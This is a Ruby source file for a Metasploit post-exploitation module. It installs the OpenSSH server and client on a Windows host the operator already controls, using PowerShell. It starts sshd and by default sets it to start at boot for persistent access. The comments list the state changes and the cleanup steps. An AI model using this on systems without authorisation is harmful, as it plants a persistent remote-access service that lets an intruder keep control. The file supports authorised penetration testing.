
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/install_ssh.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
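# Post module that installs or removes the OpenSSH server and client
# Windows capabilities through PowerShell.
#
# State changes made on the target (none of them is reverted by this module
# when the session ends):
# * Add-WindowsCapability / Remove-WindowsCapability for the capability names
#   given in SERVER_VER and CLIENT_VER
# * Start-Service / Stop-Service for sshd
# * Set-Service sshd to 'Automatic' start when AUTOSTART is set
#
# Cleanup is a second run with the UNINSTALL_* options set and the matching
# INSTALL_* options cleared. For anyone reviewing a host afterwards, the
# OpenSSH.Server capability, a running sshd service and its startup type are
# the settings to compare against the expected baseline.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv
  include Msf::Post::File
  include Msf::Post::Windows::Powershell

  # Registers module metadata and the operator-facing options.
  #
  # @param info [Hash] metadata passed in by the framework and merged through
  #   update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Install OpenSSH for Windows',
        'Description' => %q{
          This module installs OpenSSH server and client for Windows using PowerShell.
          SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Michael Long <bluesentinel[at]protonmail.com>'],
        'Arch' => [ARCH_X86, ARCH_X64],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'References' => [
          ['URL', 'https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview'],
          ['URL', 'https://github.com/PowerShell/openssh-portable']
        ]
      )
    )
    register_options(
      [
        # Both INSTALL_* options default to true and both UNINSTALL_* options
        # default to false, so a run with untouched options installs everything.
        OptBool.new('INSTALL_SERVER', [true, 'Install OpenSSH.Server for Windows', true]),
        OptBool.new('INSTALL_CLIENT', [true, 'Install OpenSSH.Client for Windows', true]),
        OptBool.new('UNINSTALL_SERVER', [true, 'Uninstall OpenSSH.Server for Windows', false]),
        OptBool.new('UNINSTALL_CLIENT', [true, 'Uninstall OpenSSH.Client for Windows', false]),
        OptString.new('SERVER_VER', [true, 'OpenSSH.Server version', 'OpenSSH.Server~~~~0.0.1.0']),
        OptString.new('CLIENT_VER', [true, 'OpenSSH.Client version', 'OpenSSH.Client~~~~0.0.1.0']),
        OptBool.new('AUTOSTART', [true, 'Sets sshd service to startup automatically at system boot for persistence', true])
      ]
    )
  end

  # Checks the preconditions, then runs the selected actions in a fixed order:
  # uninstall server, uninstall client, install server, install client.
  #
  # Fails with Failure::NoAccess when the session is neither SYSTEM nor an
  # administrator, and with Failure::NotVulnerable when powershell.exe is not
  # found under %WINDIR%\System32.
  def run
    # Missing privileges are an access problem, not a statement about whether
    # the host is vulnerable, so report them as NoAccess.
    unless is_system? || is_admin?
      fail_with(Failure::NoAccess, 'Insufficient privileges to install or remove OpenSSH')
    end

    # Every action below is a PowerShell script, so stop early without it.
    psh_path = '\\WindowsPowerShell\\v1.0\\powershell.exe'
    unless file?("%WINDIR%\\System32#{psh_path}")
      fail_with(Failure::NotVulnerable, 'No powershell available.')
    end

    warn_on_conflicting_options

    if datastore['UNINSTALL_SERVER']
      print_status('Uninstalling OpenSSH.Server')
      uninstall_ssh_server
    end

    if datastore['UNINSTALL_CLIENT']
      print_status('Uninstalling OpenSSH.Client')
      uninstall_ssh_client
    end

    if datastore['INSTALL_SERVER']
      print_status('Installing OpenSSH.Server')
      install_ssh_server
    end

    if datastore['INSTALL_CLIENT']
      print_status('Installing OpenSSH.Client')
      install_ssh_client
    end
  end

  # Adds the server capability named by SERVER_VER, starts sshd and, when
  # AUTOSTART is set, switches the service to automatic start.
  #
  # The capability name is interpolated into the script as-is; it comes from
  # the operator-set SERVER_VER option. The return value of psh_exec is passed
  # through and not inspected here.
  def install_ssh_server
    script = "Add-WindowsCapability -Online -Name #{datastore['SERVER_VER']}; Start-Service sshd; "
    script += "Set-Service -Name sshd -StartupType 'Automatic'" if datastore['AUTOSTART']
    psh_exec(script)
  end

  # Adds the client capability named by CLIENT_VER.
  def install_ssh_client
    psh_exec("Add-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}; ")
  end

  # Stops sshd, then removes the server capability named by SERVER_VER.
  def uninstall_ssh_server
    psh_exec("Stop-Service sshd; Remove-WindowsCapability -Online -Name #{datastore['SERVER_VER']}")
  end

  # Removes the client capability named by CLIENT_VER.
  def uninstall_ssh_client
    psh_exec("Remove-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}")
  end

  private

  # Warns when a component is selected for both removal and installation.
  #
  # The INSTALL_* options default to true, so a cleanup run that only sets
  # UNINSTALL_* removes the component and then installs it again, leaving the
  # host in the state the cleanup was meant to undo.
  def warn_on_conflicting_options
    %w[SERVER CLIENT].each do |component|
      next unless datastore["UNINSTALL_#{component}"] && datastore["INSTALL_#{component}"]

      print_warning(
        "UNINSTALL_#{component} and INSTALL_#{component} are both set; " \
        "OpenSSH.#{component.capitalize} will be removed and then installed again"
      )
    end
  end
end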